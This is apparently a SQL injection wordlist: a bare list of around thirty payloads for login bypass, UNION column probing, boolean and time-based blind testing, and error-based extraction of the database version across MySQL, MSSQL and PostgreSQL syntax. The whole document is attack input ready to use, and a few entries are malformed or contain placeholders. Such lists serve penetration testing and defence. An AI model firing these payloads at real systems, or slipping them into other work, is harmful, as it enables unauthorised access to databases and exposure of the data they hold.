' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
admin' --
admin' #
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL--
1' ORDER BY 1--
1' ORDER BY 10--
1' AND 1=1--
1' AND 1=2--
1' AND SLEEP(5)--
1' AND BENCHMARK(5000000,SHA1('test'))--
1'; WAITFOR DELAY '0:0:5'--
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' OR '1'='1' LIMIT 1--
1' GROUP BY column_names HAVING 1=1--
1' EXTRACTVALUE(1,CONCAT(0x7e,version()))--
1' UPDATEXML(1,CONCAT(0x7e,version()),1)--
'; SELECT pg_sleep(5)--
' AND 1=CAST(version() AS INT)--
1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' OR EXISTS(SELECT * FROM users)--
1' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)--
